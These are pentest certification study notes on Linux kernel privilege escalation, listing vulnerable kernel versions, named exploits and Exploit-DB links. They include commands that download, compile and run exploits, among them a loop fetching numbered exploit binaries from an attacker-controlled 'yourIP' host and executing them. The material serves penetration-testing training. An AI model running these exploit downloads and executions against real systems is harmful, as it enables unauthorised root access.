OSCP Notes
Linux exploitation

Linux Kernel exploits

xploit_installer.py

The following script runs the exploit suggester and automatically downloads and executes the suggested exploits:

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

Kernelpop

Automated kernel vulnerability enumeration and exploitation:

https://github.com/spencerdodd/kernelpop

Linux Local Exploit

linux-exploit-suggester
unix_privesc_check
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)

Other exploits

Exploits worth running

    Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
https://www.exploit-db.com/exploits/37292

    CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/

    Linux Kernel <= 2.6.37 'Full-Nelson.c'
https://www.exploit-db.com/exploits/15704/

    CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
https://git.zx2c4.com/CVE-2012-0056/about/
    Linux CVE-2012-0056 (download, compile and run):
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
    CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/

    Compile Dirty Cow:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

    Cross compiling exploits:
gcc -m32 -o output32 hello.c # (32 bit)
gcc -m64 -o output hello.c   # (64 bit)

    Linux 2.6.32
https://www.exploit-db.com/exploits/15285/

    Elevation in 2.6.x:
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done

See Linux exploitation scripts
